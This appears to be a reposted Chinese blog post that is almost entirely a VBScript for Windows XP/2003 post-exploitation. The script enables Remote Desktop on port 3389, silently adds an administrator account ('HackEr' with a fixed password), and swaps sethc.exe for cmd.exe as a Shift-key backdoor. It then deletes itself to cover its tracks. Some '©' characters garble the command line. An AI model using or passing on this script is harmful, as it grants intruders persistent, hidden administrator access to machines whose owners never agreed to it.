xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs

190 阅读 0 评论 126 点赞

我是靠谱客的博主负责火龙果，最近开发中收集的这篇文章主要介绍xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs，觉得挺不错的，现在分享给大家，希望可以做个参考。

概述

复制代码代码如下:

on error resume next  
const HKEY_LOCAL_MACHINE = &H80000002  
strComputer = "."  
Set StdOut = WScript.StdOut  
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_   
strComputer & "\root\default:StdRegProv")  
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"  
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath  
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"  
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath  
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"  
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"  
strValueName = "fDenyTSConnections"  
dwValue = 0  
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue  
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"  
strValueName = "PortNumber"  
dwValue = 3389  
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue  
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"  
strValueName = "PortNumber"  
dwValue = 3389  
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue  
on error resume next  
dim username,password:If Wscript.Arguments.Count  Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath  
On Error Resume Next  
Dim obj, success  
Set obj = CreateObject("WScript.Shell")  
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)  
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)